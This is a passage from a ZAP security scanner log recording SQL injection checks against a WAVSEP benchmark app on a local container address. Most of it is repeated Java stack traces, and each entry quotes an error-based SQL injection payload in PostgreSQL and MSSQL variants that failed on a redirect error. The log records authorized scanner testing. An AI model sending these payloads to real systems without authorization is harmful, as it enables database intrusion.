org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962762 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND 6523=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6523=6523) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (4263=4263] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND 6523=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6523=6523) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (4263=4263 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962763 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 9311=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9311=9311) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 9311=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9311=9311) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962765 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND 6058=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6058=6058) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('LtLf'='LtLf] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND 6058=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6058=6058) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('LtLf'='LtLf at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962766 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND 2223=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2223=2223) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'sbpq'='sbpq] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND 2223=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2223=2223) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'sbpq'='sbpq at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962767 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND 6452=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6452=6452) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND 6452=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6452=6452) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962770 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 1677=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1677=1677) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- ARvX] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 1677=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1677=1677) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- ARvX at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962772 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND 6830=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6830=6830) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (9743=9743] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND 6830=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6830=6830) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (9743=9743 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962773 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 5757=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5757=5757) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 5757=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5757=5757) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962774 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND 2904=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2904=2904) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('RiHQ'='RiHQ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND 2904=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2904=2904) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('RiHQ'='RiHQ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962775 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND 4956=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4956=4956) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'dMLd'='dMLd] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND 4956=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4956=4956) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'dMLd'='dMLd at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962777 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND 2740=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2740=2740) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND 2740=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2740=2740) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962778 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 8239=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8239=8239) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- BLog] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 